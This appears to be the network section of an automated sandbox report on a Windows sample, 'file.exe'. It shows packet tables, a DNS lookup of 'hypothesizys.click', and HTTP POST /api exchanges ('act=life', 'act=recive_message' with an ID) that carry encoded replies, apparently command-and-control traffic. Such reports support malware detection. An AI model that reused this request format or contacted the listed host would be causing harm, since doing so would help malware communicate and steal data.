                                                                                                                  Dec 23, 2024 14:28:07.639169931 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:07.639297009 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:07.639354944 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:07.639549017 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:07.639568090 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:07.738724947 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:07.738816023 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:07.738925934 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:07.739248037 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:07.739284992 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:08.952924013 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:08.953033924 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:08.954411983 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:08.954442978 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:08.954751968 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:08.956022978 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:08.956197977 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:08.956240892 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:09.759119034 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:09.759206057 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:09.759299040 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:09.764965057 CET49733443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:09.765019894 CET44349733104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:10.213009119 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:10.213051081 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:10.213130951 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:10.213466883 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:10.213480949 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:11.426712036 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:11.426843882 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:11.440001011 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:11.440015078 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:11.440222025 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:11.441392899 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:11.441577911 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:11.441610098 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:11.441674948 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:11.441684008 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:12.391514063 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:12.391592979 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:12.391746998 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:12.391977072 CET49734443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:12.391993046 CET44349734104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:13.027781010 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:13.027827978 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:13.027914047 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:13.028371096 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:13.028405905 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:14.258872986 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:14.259015083 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:14.260593891 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:14.260618925 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:14.260833979 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:14.262417078 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:14.262594938 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:14.262609005 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:15.017405033 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:15.017476082 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:15.017550945 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:15.017702103 CET49735443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:15.017740965 CET44349735104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:15.501384974 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:15.501445055 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:15.501533985 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:15.501873970 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:15.501913071 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.716425896 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.716615915 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.721549988 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.721569061 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.721786022 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.723782063 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.723782063 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.723836899 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.724654913 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.724700928 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.726686001 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.726738930 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.727634907 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.727685928 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.727900982 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.727955103 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.728183031 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.728225946 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.728247881 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.728285074 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.728460073 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.728498936 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.728539944 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.728735924 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.728806019 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.771373987 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.771599054 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.771622896 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.771650076 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.771673918 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.771702051 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.771718979 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:16.771752119 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:16.771771908 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:19.391200066 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:19.391300917 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:19.391387939 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:19.391542912 CET49736443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:19.391592979 CET44349736104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:19.474822998 CET49740443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:19.474863052 CET44349740104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:19.474941969 CET49740443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:19.475379944 CET49740443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:19.475394011 CET44349740104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:20.522469997 CET49740443192.168.2.4104.21.95.235
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 14:28:00.542002916 CET4969053192.168.2.41.1.1.1
                                                                                                                  Dec 23, 2024 14:28:00.856664896 CET53496901.1.1.1192.168.2.4
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 14:28:00.542002916 CET192.168.2.41.1.1.10x8819Standard query (0)hypothesizys.clickA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 14:28:00.856664896 CET1.1.1.1192.168.2.40x8819No error (0)hypothesizys.click104.21.95.235A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 14:28:00.856664896 CET1.1.1.1192.168.2.40x8819No error (0)hypothesizys.click172.67.149.159A (IP address)IN (0x0001)false
                                                                                                                  • hypothesizys.click
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449730104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:02 UTC265OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 8
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                  Data Ascii: act=life
                                                                                                                  2024-12-23 13:28:02 UTC1141INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=peh092893o82a5gdqfgurq1g0n; expires=Fri, 18 Apr 2025 07:14:41 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdZf%2B6pYV2bgLeeUd%2F4Vbh7K%2B8SO6hhVnQPFIcJ%2F5t1q6F3qGfL9Jx%2B%2FEm0Y9Gu%2F%2FvSc5WD35DULpsyZehaJDcxiE5e%2B9iHWMxF9%2BDKPHiTCElgBpZldYe04raOlI9WLzvAPAYI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b146bcd97d02-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2146&min_rtt=2044&rtt_var=839&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1428571&cwnd=230&unsent_bytes=0&cid=6a5f881adc4d24be&ts=829&x=0"
                                                                                                                  2024-12-23 13:28:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                  Data Ascii: 2ok
                                                                                                                  2024-12-23 13:28:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449731104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:04 UTC266OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 48
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:04 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 69 73 4f 54 5a 2d 2d 74 65 73 74 65 72 26 6a 3d
                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=VisOTZ--tester&j=
                                                                                                                  2024-12-23 13:28:04 UTC1131INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=sqfoq6g9moon47va6jluh5qpm6; expires=Fri, 18 Apr 2025 07:14:43 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Km4CFN4VooH0kf6A6A8wtgVG%2F0nCD%2FGb5WNMaDakEH7kE7VpYQStEPggNfMlXhC%2Bv0y7aHYtUM5NQVZYXQtl1nRD4oQZj38B2b5vaH5NLz4GSv2tn%2FWluKrpB6qY7U%2Bk7VETUo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b1539c308c23-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2027&rtt_var=777&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=950&delivery_rate=1392465&cwnd=227&unsent_bytes=0&cid=46a42f4bef572bfa&ts=865&x=0"
                                                                                                                  2024-12-23 13:28:04 UTC238INData Raw: 34 39 31 63 0d 0a 79 61 39 61 64 70 72 51 53 4e 4e 45 37 64 4c 31 78 73 6e 57 49 50 79 6d 4f 65 7a 6d 56 55 43 77 39 69 51 62 78 45 32 75 4a 4e 65 79 6a 53 78 55 6f 4f 52 6b 38 54 65 49 38 4d 2b 79 75 36 4e 46 30 49 52 59 69 4d 52 76 4a 74 47 61 56 33 37 6f 62 39 68 4a 39 66 50 4a 4f 78 72 70 74 57 54 78 49 5a 58 77 7a 35 32 79 39 45 57 53 68 41 50 4f 67 7a 38 69 30 5a 70 47 65 71 38 69 33 6b 69 30 6f 63 4d 39 48 76 2b 7a 4c 4c 49 6f 67 4c 65 51 6f 36 69 38 54 70 58 4c 55 59 48 45 65 57 4c 56 6a 41 59 68 35 67 44 4c 55 4c 61 45 7a 69 6b 64 75 4b 31 6b 71 47 61 49 76 4e 66 38 36 37 64 46 6e 73 70 66 69 49 30 39 4b 4e 69 53 52 33 2b 75 50 63 64 43 76 36 48 4e 50 68 2f 31 75 6a 69 2f 49 6f 65 38 6c 71 6d 6f
                                                                                                                  Data Ascii: 491cya9adprQSNNE7dL1xsnWIPymOezmVUCw9iQbxE2uJNeyjSxUoORk8TeI8M+yu6NF0IRYiMRvJtGaV37ob9hJ9fPJOxrptWTxIZXwz52y9EWShAPOgz8i0ZpGeq8i3ki0ocM9Hv+zLLIogLeQo6i8TpXLUYHEeWLVjAYh5gDLULaEzikduK1kqGaIvNf867dFnspfiI09KNiSR3+uPcdCv6HNPh/1uji/Ioe8lqmo
                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 39 41 7a 65 77 30 50 4f 33 48 64 78 34 4a 64 58 61 4c 4d 69 33 45 44 31 74 49 4d 68 56 50 2b 2b 61 75 6c 6d 68 37 79 5a 6f 61 69 37 52 5a 2f 45 53 59 47 45 4e 43 72 61 6b 45 78 32 71 53 44 43 54 4c 4b 6a 78 44 38 62 2f 37 6f 73 76 69 58 50 2f 74 65 6a 73 2f 51 61 33 75 52 4c 6a 59 63 6a 4c 38 50 55 57 54 65 2f 62 38 74 4b 39 66 4f 4e 50 68 72 35 76 79 71 6a 4c 6f 53 37 6b 72 61 67 76 55 2b 54 78 46 61 45 69 7a 51 69 31 5a 35 4d 64 71 77 72 77 55 75 7a 71 38 31 34 57 72 69 31 4d 76 46 2b 7a 35 4f 53 74 4b 79 34 56 4e 7a 2b 47 35 48 4b 4c 6d 4c 56 6d 41 59 68 35 69 66 4a 52 62 61 67 77 6a 73 63 38 36 41 71 6f 79 43 43 74 59 57 69 72 72 70 49 6e 64 5a 52 67 49 49 30 4b 39 6d 64 51 33 36 69 62 34 49 47 73 72 4f 4e 59 46 54 5a 76 79 47 39 4c 4a 69 77 31 37 76
                                                                                                                  Data Ascii: 9Azew0PO3Hdx4JdXaLMi3ED1tIMhVP++aulmh7yZoai7RZ/ESYGENCrakEx2qSDCTLKjxD8b/7osviXP/tejs/Qa3uRLjYcjL8PUWTe/b8tK9fONPhr5vyqjLoS7kragvU+TxFaEizQi1Z5MdqwrwUuzq814Wri1MvF+z5OStKy4VNz+G5HKLmLVmAYh5ifJRbagwjsc86AqoyCCtYWirrpIndZRgII0K9mdQ36ib4IGsrONYFTZvyG9LJiw17v
                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 74 5a 58 68 49 49 34 4c 39 37 55 43 44 6d 68 4e 34 77 65 39 59 48 4f 4c 42 66 79 38 42 2b 79 4b 49 47 33 67 65 53 30 2b 6c 76 65 77 31 66 4f 33 48 63 76 30 35 78 41 61 36 6b 69 7a 30 69 37 70 4d 67 33 48 50 69 79 4a 37 51 69 68 4c 75 55 71 61 2b 6d 53 4a 37 4d 58 6f 2b 4f 50 57 4b 63 31 45 46 68 35 6e 65 4d 64 36 4b 67 6a 77 30 58 39 72 77 74 70 32 61 51 2f 6f 37 6b 72 4c 67 43 78 6f 52 57 68 6f 45 79 4c 64 4f 65 53 48 79 73 49 38 52 49 74 72 6e 43 50 42 54 30 75 69 43 38 4b 49 75 34 6e 71 2b 67 73 6b 4b 66 7a 68 76 41 78 44 41 36 6b 73 77 47 54 61 45 6a 77 55 6e 33 6e 73 34 32 47 76 2b 6b 61 71 35 6f 6c 76 43 51 71 4f 76 73 41 70 4c 4e 57 34 57 4f 4d 79 4c 56 6d 55 4e 36 6f 53 7a 42 51 62 2b 6c 79 6a 77 59 38 62 38 73 73 53 47 4c 74 59 57 68 6f 72 68 4f
                                                                                                                  Data Ascii: tZXhII4L97UCDmhN4we9YHOLBfy8B+yKIG3geS0+lvew1fO3Hcv05xAa6kiz0i7pMg3HPiyJ7QihLuUqa+mSJ7MXo+OPWKc1EFh5neMd6Kgjw0X9rwtp2aQ/o7krLgCxoRWhoEyLdOeSHysI8RItrnCPBT0uiC8KIu4nq+gskKfzhvAxDA6kswGTaEjwUn3ns42Gv+kaq5olvCQqOvsApLNW4WOMyLVmUN6oSzBQb+lyjwY8b8ssSGLtYWhorhO
                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 6a 45 4b 47 7a 4c 31 45 46 31 35 6e 65 4d 54 37 79 35 77 7a 59 64 39 62 51 69 74 69 69 43 75 35 47 76 72 4c 4e 45 6b 38 78 57 69 34 63 32 4a 74 69 47 52 58 4b 73 49 73 59 47 2b 2b 76 4b 49 46 53 67 38 67 32 39 44 35 2b 72 68 62 4c 72 71 77 79 48 68 46 79 43 78 47 39 69 30 5a 74 50 64 71 34 6e 77 30 6d 78 70 63 73 2b 47 66 32 39 49 4b 4d 75 67 62 32 63 71 36 43 6d 51 70 50 41 56 34 71 4d 50 43 69 53 32 67 5a 2b 76 6d 2b 55 42 6f 43 6d 77 6a 67 58 37 76 49 31 2f 7a 2f 50 74 35 76 6b 38 2f 52 4f 6b 4d 52 55 67 6f 67 38 4b 74 4f 59 53 48 36 6a 4a 73 52 4f 70 36 72 4a 4d 42 58 32 76 53 75 31 49 34 71 30 6b 4b 43 74 75 77 4c 51 68 46 79 57 78 47 39 69 2f 62 4e 7a 4f 34 63 56 6a 46 6e 37 73 6f 30 2f 47 4c 6a 71 61 72 30 6c 67 37 69 59 6f 71 4b 34 53 4a 66 50 56
                                                                                                                  Data Ascii: jEKGzL1EF15neMT7y5wzYd9bQitiiCu5GvrLNEk8xWi4c2JtiGRXKsIsYG++vKIFSg8g29D5+rhbLrqwyHhFyCxG9i0ZtPdq4nw0mxpcs+Gf29IKMugb2cq6CmQpPAV4qMPCiS2gZ+vm+UBoCmwjgX7vI1/z/Pt5vk8/ROkMRUgog8KtOYSH6jJsROp6rJMBX2vSu1I4q0kKCtuwLQhFyWxG9i/bNzO4cVjFn7so0/GLjqar0lg7iYoqK4SJfPV
                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 68 31 70 46 4a 65 4b 63 70 33 6b 47 38 75 63 4d 31 47 2f 43 36 49 37 41 69 69 72 32 52 71 4b 47 31 52 5a 44 4b 55 38 37 4b 64 79 58 4b 31 42 34 35 68 7a 2f 58 56 4b 4f 6d 37 44 55 62 75 4b 31 6b 71 47 61 49 76 4e 66 38 36 37 31 51 6d 73 6c 4a 68 34 4d 35 4c 64 47 47 52 33 53 74 50 63 74 4a 73 61 7a 42 50 68 76 2b 73 79 2b 37 4b 6f 69 31 6e 4b 75 6e 39 41 7a 65 77 30 50 4f 33 48 63 4d 32 59 64 52 65 71 67 6b 32 6c 33 31 74 49 4d 68 56 50 2b 2b 61 75 6c 6d 6a 4c 75 63 6f 4b 75 34 51 70 72 4a 57 35 79 4c 4d 43 58 62 6e 31 52 7a 6f 53 6a 48 54 72 36 6b 79 79 6f 59 39 71 41 76 6f 7a 54 50 2f 74 65 6a 73 2f 51 61 33 76 4a 63 6e 70 51 30 59 4f 4f 43 52 57 2b 74 49 73 41 47 71 75 58 55 65 42 50 30 38 6e 4c 78 49 49 43 35 6c 4b 75 71 76 55 36 54 77 56 4b 4c 68 54
                                                                                                                  Data Ascii: h1pFJeKcp3kG8ucM1G/C6I7Aiir2RqKG1RZDKU87KdyXK1B45hz/XVKOm7DUbuK1kqGaIvNf8671QmslJh4M5LdGGR3StPctJsazBPhv+sy+7Koi1nKun9Azew0PO3HcM2YdReqgk2l31tIMhVP++aulmjLucoKu4QprJW5yLMCXbn1RzoSjHTr6kyyoY9qAvozTP/tejs/Qa3vJcnpQ0YOOCRW+tIsAGquXUeBP08nLxIIC5lKuqvU6TwVKLhT
                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 64 48 71 39 62 39 4d 49 72 4f 76 4b 4e 46 53 67 38 69 6d 32 4a 59 36 36 6e 71 69 6b 73 30 61 4d 7a 6c 79 63 68 54 59 70 33 35 68 47 64 4b 73 6c 7a 55 2b 34 70 38 41 2f 45 2f 65 33 61 76 39 6d 69 4b 6a 58 2f 4f 75 56 54 35 58 49 41 4e 54 45 4b 47 7a 4c 31 45 46 31 35 6e 65 4d 52 72 2b 75 78 7a 55 58 39 37 45 34 73 43 43 64 73 4a 71 75 75 62 35 4a 6d 38 6c 57 67 34 63 78 4a 4e 6d 59 56 48 43 6d 4c 4d 63 47 2b 2b 76 4b 49 46 53 67 38 67 6d 6d 4d 49 57 33 6d 37 4b 67 74 55 47 49 79 55 76 4f 79 6e 63 7a 31 59 55 47 49 62 41 2f 32 30 47 71 35 64 52 34 45 2f 54 79 63 76 45 67 68 72 61 51 6f 71 57 6d 52 35 6a 4c 56 49 65 4e 4d 79 72 52 6c 45 4a 39 6f 53 72 50 53 72 36 73 7a 6a 63 51 38 62 77 6a 76 6d 62 42 38 4a 43 38 36 2b 77 43 76 39 39 59 67 6f 6c 33 50 5a 79
                                                                                                                  Data Ascii: dHq9b9MIrOvKNFSg8im2JY66nqiks0aMzlychTYp35hGdKslzU+4p8A/E/e3av9miKjX/OuVT5XIANTEKGzL1EF15neMRr+uxzUX97E4sCCdsJquub5Jm8lWg4cxJNmYVHCmLMcG++vKIFSg8gmmMIW3m7KgtUGIyUvOyncz1YUGIbA/20Gq5dR4E/TycvEghraQoqWmR5jLVIeNMyrRlEJ9oSrPSr6szjcQ8bwjvmbB8JC86+wCv99Ygol3PZy
                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 47 2f 4c 58 76 58 7a 6a 52 67 66 37 72 63 74 70 32 53 36 73 35 6d 71 72 4b 49 43 67 66 73 56 7a 6f 73 74 59 6f 71 74 58 7a 6d 68 49 34 77 65 39 62 37 4b 4f 42 50 69 70 43 32 39 4e 34 53 39 6d 34 61 6b 73 31 53 64 79 31 69 66 6a 58 73 70 33 39 51 49 4f 61 45 33 6a 42 37 31 68 4d 6f 75 46 39 65 78 4f 37 68 6d 77 66 43 51 73 75 76 73 41 71 43 45 53 59 32 55 4e 43 33 44 71 67 59 68 76 78 47 4d 54 61 4f 73 33 54 73 43 38 37 38 6d 6f 42 6a 50 36 4d 50 32 2b 65 59 51 7a 4e 73 62 6b 62 74 35 59 74 50 55 48 6b 43 2f 62 39 6f 47 37 66 6d 44 65 41 61 34 36 6d 72 32 4a 5a 32 69 6b 61 65 39 74 77 57 67 2b 6e 79 59 6a 6a 41 79 31 59 4e 4a 4f 65 68 76 77 77 62 74 6b 6f 30 78 45 2b 4f 6a 50 4c 77 32 69 50 43 6f 36 75 75 73 41 73 61 45 62 6f 32 4b 4f 53 58 45 68 51 74 65
                                                                                                                  Data Ascii: G/LXvXzjRgf7rctp2S6s5mqrKICgfsVzostYoqtXzmhI4we9b7KOBPipC29N4S9m4aks1Sdy1ifjXsp39QIOaE3jB71hMouF9exO7hmwfCQsuvsAqCESY2UNC3DqgYhvxGMTaOs3TsC878moBjP6MP2+eYQzNsbkbt5YtPUHkC/b9oG7fmDeAa46mr2JZ2ikae9twWg+nyYjjAy1YNJOehvwwbtko0xE+OjPLw2iPCo6uusAsaEbo2KOSXEhQte
